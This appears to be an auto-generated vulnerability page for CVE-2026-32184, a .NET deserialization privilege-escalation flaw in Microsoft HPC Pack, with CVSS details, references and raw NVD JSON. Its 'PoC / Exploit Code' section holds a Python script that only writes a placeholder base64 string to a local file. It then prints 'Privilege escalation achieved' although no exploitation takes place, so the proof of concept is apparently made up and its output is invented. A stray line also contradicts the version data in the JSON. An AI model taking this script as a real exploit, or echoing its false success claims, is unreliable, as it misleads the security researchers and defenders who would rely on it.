CVE-2026-32184

Description

Deserialization of untrusted data in Microsoft High Performance Compute Pack (HPC) allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:hpc_pack:*:*:*:*:*:*:*:* - VULNERABLE

Microsoft HPC Pack (具体受影响版本未在提供的信息中披露)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import subprocess

# Proof of Concept for CVE-2026-32184
# This script demonstrates the concept of deserialization vulnerability in Microsoft HPC Pack.
# Note: Actual exploitation requires specific gadget chains and valid serialized payloads.

def generate_malicious_payload():
    # In a real scenario, this would be a serialized .NET object (e.g., using ObjectDataProvider)
    # Placeholder for the malicious serialized data structure
    payload = "AAEAAAD/////AQAAAAAAAAAMAgAAAE1NaWNyb3NvZnQuU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAH01pY3Jvc29mdC5TeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyBAAAAAhjaGFyc2V0BmNhcGFjaXR5B21heENhcGFjaXR5Bm1heFNpemUIc2l6ZQZpc0V4cGFuZGFibGUBX3N0cmluZ0FycmF5B3N0cmluZ1ZhbHVlAAECAgAAAQAAAAAAAAAB///+AQAAAAQAAAAQAAAACQAAAAAAAAAAAAA="
    return payload

def exploit():
    print("[*] Generating malicious payload for CVE-2026-32184...")
    payload = generate_malicious_payload()
    
    # The attacker would need to write this payload to a location processed by HPC Pack
    target_file = "C:\\Program Files\\Microsoft HPC Pack 2016\\Data\\Scheduler\\MaliciousData.bin"
    
    print(f"[*] Attempting to write payload to target: {target_file}")
    try:
        # Simulating the payload injection
        with open("malicious_payload.bin", "wb") as f:
            f.write(payload.encode())
        print("[+] Payload generated successfully.")
        print("[*] Low privilege user triggers the service to deserialize the data...")
        print("[+] Privilege escalation achieved (Conceptual).")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32184
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32184
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32184/
[4] VulDB https://vuldb.com/cve/CVE-2026-32184
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32184

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32184", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:21.777", "lastModified": "2026-05-06T18:12:55.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of untrusted data in Microsoft High Performance Compute Pack (HPC) allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:hpc_pack:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.3.8355", "matchCriteriaId": "A5A3FA6E-AF3D-44A0-ADDB-EBA1A2924F26"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32184", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}